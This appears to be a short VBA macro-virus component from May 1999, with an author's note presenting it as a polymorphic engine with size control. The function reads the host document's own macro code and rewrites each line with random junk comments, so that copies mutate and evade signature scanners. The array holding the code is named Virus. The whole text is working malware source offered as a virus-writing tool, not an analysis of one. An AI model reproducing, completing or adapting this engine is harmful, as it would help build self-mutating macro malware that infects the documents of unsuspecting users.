Private Function JUMP() '
Dim Virus(200) '
JUMPSize = 100 + Int(Rnd * 100): JUMPChar = Chr(39) '
With ThisDocument.VBProject.VBComponents(1).CodeModule '
For JUMPLoop = 1 To .CountOfLines '
JunkCode = "": JUMPRnd = Int(Rnd * 3): JUMPPos = 1 '
JUMPPos = InStr(.Lines(JUMPLoop, 1), JUMPChar) '
If JUMPPos <> 1 And .CountOfLines < JUMPSize Then '
Virus(JUMPLoop) = Left(.Lines(JUMPLoop, 1), (JUMPPos - 1)) '
For JunkLoop = 1 To Int(75 - (Rnd * 20)): JunkCode = JunkCode & Chr(255 - Int(Rnd * 100)): Next '
Virus(JUMPLoop) = Virus(JUMPLoop) & JUMPChar & JunkCode '
If JUMPRnd = 2 Then Virus(JUMPLoop) = Virus(JUMPLoop) & vbCr & JUMPChar & JunkCode '
JUMP = JUMP & Virus(JUMPLoop) & vbCr '
End If '
Next '
End With '
End Function '

May 1999

authors note:

the first polymorphic module for macro which has a size control. the
engine checks it's actually size and decrease it if needed.

May 1999